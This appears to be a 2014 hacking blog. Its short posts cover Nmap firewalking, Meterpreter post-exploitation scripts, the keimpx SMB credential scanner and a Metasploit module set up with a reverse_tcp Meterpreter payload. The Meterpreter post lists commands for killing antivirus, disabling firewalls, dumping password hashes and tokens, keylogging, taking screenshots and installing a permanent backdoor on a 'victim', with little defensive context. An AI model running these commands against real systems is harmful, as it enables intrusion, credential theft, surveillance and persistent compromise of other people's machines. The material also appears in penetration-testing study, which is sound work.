Monday, 14 July 2014

Nmap Firewalk Script


it's usefull for discover firewall rules using an IP TTL expiration technique known as firewalking.

Example Usage

nmap --script=firewalk --traceroute <host>
nmap --script=firewalk --traceroute --script-args=firewalk.max-retries=1 <host>
nmap --script=firewalk --traceroute --script-args=firewalk.probe-timeout=400ms <host>
nmap --script=firewalk --traceroute --script-args=firewalk.max-probed-ports=7 <host>

Download : Nmap Firewalk Script


Posted by at No comments:
Labels: , , ,

Sunday, 13 July 2014

Best Meterpreter Script



getcountermeasure

Getcountermeasure is an automated script Disable security measures such as antivirus, firewall, and more.

Command : run getcountermeasure


winenum

Winenum script is used to dump tokens, hashes and more

Command : run winenum

getgui

getgui script is used to enable RDP on a target system.

Command : run getgui -e


killav

Killav used to disable most antivirus programs.

Command : run killav
gettelnet

gettelnet script is used to enable telnet on the victim.

Command : run gettelnet -e

hostedit

Hostedit Meterpreter script is used to edit host file of windows

Command : run hostedit

checkvm

Checkvm used to see if you exploited a virtual machine

Command : run checkvm

screenspy

screenspy used to take screenshot of remote pc.

Command : run screenspy

keylogrecorder

keylogrecorder used to start keylogger in victim pc.

Command : run keylogrecorder

metsvc

used to make permanent backdoor
Posted by at No comments:
Labels: ,

Saturday, 12 July 2014

keimpx – SMB Credential Scanner


keimpx is an open source tool, released under a modified version of Apache License 1.1. It can be used to quickly check for the usefulness of credentials across a network over SMB. Credentials can be:

  1. Combination of user / plain-text password.
  2. Combination of user / NTLM hash.
  3. Combination of user / NTLM logon session token.

    If any valid credentials has been discovered across the network after its attack phase, the user is asked to choose which host to connect to and which valid credentials to use, then he will be prompted with an interactive SMB shell where the user can:

    1. Spawn an interactive command prompt.
    2. Navigate through the remote SMB shares: list, upload, download files, create, remove files, etc.
    3. Deploy and undeploy his own service, for instance, a backdoor listening on a TCP port for incoming connections.
    4. List users details, domains and password policy.



      Posted by at No comments:
      Labels: ,

      Friday, 11 July 2014

      How to get MUICache Entries in Remote Windows Machine


      According to Nirsoft.net, “each time that you start using a new application, Windows operating system automatically extract the application name from the version resource of the exe file, and stores it for using it later, in Registry key known as the ‘MuiCache’.”

      use post/windows/gather/enum_muicache

      msf exploit (enum_muicache)>set payload windows/meterpreter/reverse_tcp

      msf exploit (enum_muicache)>set lhost 192.168.1.3 (IP of Local Host)

      msf exploit (enum_muicache)>set session 2

      msf exploit (enum_muicache)>exploit


      Posted by at No comments:
      Labels: , , ,
      Subscribe to: Comments (Atom)